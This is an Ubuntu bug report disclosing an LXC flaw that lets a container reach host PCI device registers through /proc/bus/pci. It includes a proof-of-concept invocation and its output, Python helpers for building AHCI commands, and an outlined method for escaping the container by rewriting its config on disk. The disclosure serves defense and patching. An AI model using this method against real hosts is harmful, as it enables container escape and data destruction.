** Changed in: lxc (Ubuntu)
Status: Triaged => Fix Released
** Information type changed from Private Security to Public
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1511197
Title:
PCI Device Access Through /proc/
Status in lxc package in Ubuntu:
Fix Released
Bug description:
PCI Device Control Region Access From Within Containers
#Summary:
* From within a container, it is possible to access the control regions
of devices attached to the host PCI bus through the /proc/bus/pci/ interface.
This is allowed because of the CAP_SYS_RAWIO capability, which is enabled by
default inside an LXC container. This proof of concept uses the vulnerability
to speak to an AHCI device directly and ask a SATA drive to identify itself
(although it could trivially be used to cause a denial of service on the
drive instead). The choice of an AHCI drive is arbitrary; a different
approach would be to go after other targets on the PCI bus, such as the
network controller.
* This proof of concept is meant to demonstrate the ability to circumvent
containerization by communicating with the underlying hardware directly. It
is likely this could be leveraged into full access to the underlying hard
disk; however, that exploitation would be quite complicated and is discussed
in full later.
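Whether a given container actually holds CAP_SYS_RAWIO can be checked from
the CapEff line of /proc/self/status. The following is a minimal sketch, not
part of the attached tool; the function names are made up for illustration,
and the only fixed fact it relies on is that CAP_SYS_RAWIO is capability
number 17 in linux/capability.h.

```python
CAP_SYS_RAWIO = 17  # capability number from <linux/capability.h>


def effective_caps(status_text: str) -> str:
    """Return the CapEff hex string from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split(":", 1)[1].strip()
    raise ValueError("no CapEff line found")


def has_capability(cap_mask_hex: str, cap: int) -> bool:
    """Return True if bit number `cap` is set in a hex capability mask."""
    return bool((int(cap_mask_hex, 16) >> cap) & 1)
```

Inside the container, passing the contents of /proc/self/status to
effective_caps() and the result to has_capability(mask, CAP_SYS_RAWIO)
should report True if the capability has not been dropped.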
#Reproduction:
* My test environment was a VMware Workstation system running
Ubuntu. The primary disk was a SCSI disk, but I added a secondary 1GB SATA
disk with no special settings (write caching was enabled by default).
The PoC can talk to the disk whether or not it is mounted.
* I created a default LXC environment using the instructions at
https://help.ubuntu.com/lts/serverguide/lxc.html.
* As the root user in the LXC container, I used lspci -vv to get the
information about the target AHCI device:
02:05.0 SATA controller: VMware Device 07e0 (prog-if 01 [AHCI 1.0])
Subsystem: VMware Device 07e0
Physical Slot: 37
Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+
Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Latency: 64
Interrupt: pin A routed to IRQ 72
Region 5: Memory at fd5ee000 (32-bit, non-prefetchable) [size=4K]
[virtual] Expansion ROM at e7b10000 [disabled] [size=64K]
Capabilities: [40] Power Management version 3
Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-)
Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME-
Capabilities: [48] MSI: Enable+ Count=1/1 Maskable- 64bit+
Address: 00000000fee00000 Data: 4024
Capabilities: [60] SATA HBA v1.0 InCfgSpace
Capabilities: [70] PCI Advanced Features
AFCap: TP+ FLR+
AFCtrl: FLR-
AFStatus: TP-
Kernel driver in use: ahci
* Compile the attached tool (pciread.c), then run it within
the container. In this example, the invocation was:
#./pciread -b 02 -d 05 -f 0 -a 0xfd5ee000 -p 1
which produced the following output:
bar: fd5ee000 bus: 02 device: 05 function: 0
opened /proc/bus/pci/02/05.0
mapping 1 pages of size: 4096
AHCI 0001.0300 32 slots 30 ports 6 Gbps 0x3fffffff impl
IRQs disabled
Supports 64-bit addresses
Supports native command queuing
DMA buffer @ 0x35b6b000
cmd list buffer @ 0x25f9c000
FIS buffer @ 0x26ccf000
cmd buffer @ 0xe7e3000
p->ports_impl: 0x3fffffff
--------- port 0 ---------
command list base address: 0x0
FIS base address: 0x14c29000
interrupt status: 0x0
interrupt enable: 0x7840007f
PORT_IRQ_D2H_REG_FIS
PORT_IRQ_PIOS_FIS
PORT_IRQ_DMAS_FIS
PORT_IRQ_SDB_FIS
PORT_IRQ_UNK_FIS
PORT_IRQ_SG_DONE
PORT_IRQ_CONNECT
PORT_IRQ_PHYRDY
PORT_IRQ_IF_ERR
PORT_IRQ_HBUS_DATA_ERR
PORT_IRQ_HBUS_ERR
PORT_IRQ_TF_ERR
command and status: 0x44016
PORT_CMD_SPIN_UP
PORT_CMD_POWER_ON
PORT_CMD_FIS_RX
PORT_CMD_FIS_ON
signature : 0x101 (SATA drive)
tfd : 0x441
status : 0x123
errors : 0x0
active : 0x0
control : 0x320
---------------------------
interrupt status before: 0x0
start bit before: 0
interrupt status after: 0x2
PORT_IRQ_PIOS_FIS
Waiting for command completion
Seems to have completed...
Got response data in DMA buffer:
0x7f5a27873000: 7a 42 ab 08 00 00 0f 00 00 00 00 00 3f 00 00 00  zB....... .......
0x7f5a27873010: 00 00 00 00 30 30 30 30 30 30 30 30 30 30 30 30  ....00000 0000000
0x7f5a27873020: 30 30 30 30 30 30 31 30 00 00 40 00 00 00 30 30  00000010. .....00
0x7f5a27873030: 30 30 30 30 31 30 4d 56 61 77 65 72 56 20 72 69  000010MVa werV.ri
0x7f5a27873040: 75 74 6c 61 53 20 54 41 20 41 61 48 64 72 44 20  utlaS.TA. AaHdrD.
0x7f5a27873050: 69 72 65 76 20 20 20 20 20 20 20 20 20 20 ff 80  irev..... .......
0x7f5a27873060: 00 00 00 0f 01 40 00 02 00 00 07 00 ab 08 0f 00  ......... .......
0x7f5a27873070: 3f 00 3b ff 1f 00 ff 01 00 00 20 00 00 00 07 00  ......... .......
0x7f5a27873080: 03 00 78 00 78 00 78 00 78 00 00 00 00 00 00 00  ..x.x.x.x .......
0x7f5a27873090: 00 00 00 00 00 00 1f 00 06 01 00 00 00 00 00 00  ......... .......
0x7f5a278730a0: 7e 00 18 00 08 40 08 74 00 41 08 40 80 34 00 41  .......t. A...4.A
[SNIP]
* The hexdump output shows the ATA IDENTIFY command response sent back
from the controller.
* The code makes some assumptions. It assumes the drive it is
going to talk to is the first active device it finds in the AHCI port
list.
* It also does not cleanly restore everything after getting the response,
so the mapped registers are left in an inconsistent state and the kernel
can no longer mount or otherwise use the device afterwards.
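The string fields in an IDENTIFY response are stored with the two bytes of
each 16-bit word swapped, which is why the ASCII column of the dump reads
"MVawer" rather than "VMware". As a rough sketch (the helper name is
invented here; the word range 27-46 for the model number comes from the ATA
specification), the model string in the dump can be decoded like this:

```python
def ata_string(identify: bytes, first_word: int, last_word: int) -> str:
    """Decode an ATA IDENTIFY string spanning 16-bit words first_word..last_word."""
    raw = identify[first_word * 2:(last_word + 1) * 2]
    swapped = bytearray()
    for i in range(0, len(raw) - 1, 2):
        # Each word holds its first character in the high (second) byte.
        swapped += bytes((raw[i + 1], raw[i]))
    return swapped.decode("ascii", errors="replace").strip()


# Bytes 0x36..0x5d of the dump above (IDENTIFY words 27-46, the model number).
MODEL_BYTES = bytes.fromhex(
    "4d56 6177 6572 5620 7269 7574 6c61 5320"
    "5441 2041 6148 6472 4420 6972 6576"
) + b" " * 10

# Pad with zeros so that word 27 sits at byte offset 54, as in a real response.
identify = bytes(54) + MODEL_BYTES
print(ata_string(identify, 27, 46))  # VMware Virtual SATA Hard Drive
```

The same helper applied to words 10-19 and 23-26 of a full response would
give the serial number and firmware revision.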
# Explanation of PoC
While reading the attached code is instructive, here is an overview of the
methodology used:
* Map the control region of the AHCI device into memory through the
/proc/bus/pci/ interface using open(), mmap(), and ioctl().
* Allocate several buffers, and determine their physical addresses using
/proc/self/pagemap.
* Disable interrupts for the device.
* Find the port the drive is attached to.
* Set the FIS, Command, and Command List pointers on the device to the
previously allocated buffers.
* Create an H2D FIS (to tell the drive to identify itself), a command to wrap
the FIS (telling the drive to use a DMA buffer we have allocated), and a
command list structure containing the command.
* Copy all of these to our previously allocated buffers, which the device
also now has pointers to.
* Flip the start bit on the device to cause it to process commands from the
command list.
* Sleep for a second, then spin loop until the drive has processed our
command.
* The drive has now executed our command (ATA_CMD_ID_ATA, which is the drive
identification command), and written the result to a buffer we allocated. We
print it out, and attempt (poorly) to restore the drive's state.
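To make the three structures in the steps above more concrete, here is a
hedged sketch of how they could be laid out as raw bytes. It is not taken
from pciread.c; the function names are hypothetical, and the field offsets
follow the Serial ATA and AHCI 1.x specifications as I understand them. The
addresses in the usage note are the ones printed in the output above and are
used purely as illustrative values. Nothing here touches hardware.

```python
import struct

FIS_TYPE_REG_H2D = 0x27  # Register FIS, host to device
ATA_CMD_ID_ATA = 0xEC    # IDENTIFY DEVICE


def build_h2d_fis(command: int, device: int = 0) -> bytes:
    """Build a 20-byte Register H2D FIS carrying an ATA command."""
    fis = bytearray(20)
    fis[0] = FIS_TYPE_REG_H2D
    fis[1] = 0x80          # C bit: this FIS updates the command register
    fis[2] = command
    fis[7] = device
    return bytes(fis)


def build_prd(buf_phys: int, nbytes: int) -> bytes:
    """Build one 16-byte PRD entry describing a DMA buffer."""
    # The byte count field stores (length - 1) in bits 21:0.
    return struct.pack("<IIII", buf_phys & 0xFFFFFFFF, buf_phys >> 32,
                       0, (nbytes - 1) & 0x3FFFFF)


def build_cmd_table(fis: bytes, prds: list) -> bytes:
    """Build a command table: FIS at offset 0, PRD entries from offset 0x80."""
    return fis.ljust(0x80, b"\x00") + b"".join(prds)


def build_cmd_header(table_phys: int, prd_count: int,
                     fis_len_bytes: int = 20) -> bytes:
    """Build a 32-byte command list entry pointing at a command table."""
    dw0 = ((fis_len_bytes // 4) & 0x1F) | ((prd_count & 0xFFFF) << 16)
    return struct.pack("<IIII16x", dw0, 0,
                       table_phys & 0xFFFFFFFF, table_phys >> 32)
```

For the IDENTIFY case this would be used roughly as
build_cmd_table(build_h2d_fis(ATA_CMD_ID_ATA), [build_prd(0x35b6b000, 512)])
together with build_cmd_header(0x0e7e3000, 1), after which the bytes are
copied into the buffers whose physical addresses were given to the device.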
# Full Impact
As noted earlier, zeroing out the device's control regions renders the
device inoperable until the host is restarted. In addition, a different
PCI device may prove an easier target for an attacker.
Continuing with the AHCI device scenario, it is very likely this
vulnerability could be leveraged for arbitrary reads/writes to the
underlying drive. Doing this is not at all straightforward, because you
are not the kernel. In order to actually issue commands to the AHCI
device, it is necessary to change several pointers in the AHCI device's
memory. Because the kernel keeps its own cached copy of these pointers
and their contents, requests the kernel makes to the device during this
time will at best be incorrect, and at worst will cause a kernel
crash/panic/oops.
An exploitation scenario for full container escape would look roughly
like:
* Create a situation where the disk is idle. This could be done a number of
ways:
** Engage the kernel in processor-intensive activity that does not
require disk access (so nothing that will require using swap). This may be
somewhat easier than expected due to CAP_SYS_NICE.
** Disable interrupts on the device. It's not clear to me whether the
kernel would crash/panic/oops, or whether it would behave itself for short
amounts of time with the device's interrupts disabled.
** Set the device's busy flags to tell the kernel the device is busy.
However, the kernel is free to ignore these.
** Opportunistically wait until the drive is idle.
* Issue a FIS to read the superblock of the disk into memory and parse it.
* Repeat this process of reading inodes to navigate the inode tree until you
have found the inode for the targeted lxc.container.config file.
* Find the block which contains the piece of this file you wish to modify and
read it into memory.
* Modify it so that the configuration calls for the host root to be mounted
inside the container RW.
* Issue a FIS to overwrite the targeted block with the new modified block.
* On container restart, you now have the true root mounted inside your
container.
Note that it may be necessary to perform each one of these drive
operations individually, and then restore the drive to its original
state in between, so as not to alarm the kernel. Reading more than a
page of data is also potentially problematic, as you need to ensure
your allocated buffer is contiguous in physical memory. However, this
could likely be accomplished with something analogous to heap feng
shui, or simply by reading multi-page targets in multiple requests
of at most one page.
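The contiguity concern can be checked with the same /proc/self/pagemap data
used to locate the buffers. The sketch below is illustrative only: the
function names are invented, a 4096-byte page is assumed (matching the
"size: 4096" line in the output), and the entry layout (PFN in bits 0-54,
"present" in bit 63) is the one documented for the kernel's pagemap
interface. Note that newer kernels report a PFN of zero to processes without
CAP_SYS_ADMIN.

```python
PAGE_SIZE = 4096              # assumed page size
PM_PRESENT = 1 << 63          # page is present in RAM
PM_PFN_MASK = (1 << 55) - 1   # bits 0-54: page frame number


def pagemap_offset(vaddr: int, page_size: int = PAGE_SIZE) -> int:
    """File offset in /proc/self/pagemap of the 8-byte entry for vaddr."""
    return (vaddr // page_size) * 8


def entry_to_phys(entry: int, vaddr: int, page_size: int = PAGE_SIZE):
    """Translate vaddr to a physical address, or None if the page is absent."""
    if not entry & PM_PRESENT:
        return None
    return (entry & PM_PFN_MASK) * page_size + vaddr % page_size


def physically_contiguous(entries) -> bool:
    """True if consecutive virtual pages map to consecutive page frames."""
    pfns = []
    for entry in entries:
        if not entry & PM_PRESENT:
            return False
        pfns.append(entry & PM_PFN_MASK)
    return all(b == a + 1 for a, b in zip(pfns, pfns[1:]))
```

An entry would be read by seeking to pagemap_offset(vaddr) in
/proc/self/pagemap and unpacking 8 little-endian bytes. With the values from
the output above, a present entry with PFN 0x35b6b for virtual address
0x7f5a27873000 translates to 0x35b6b000.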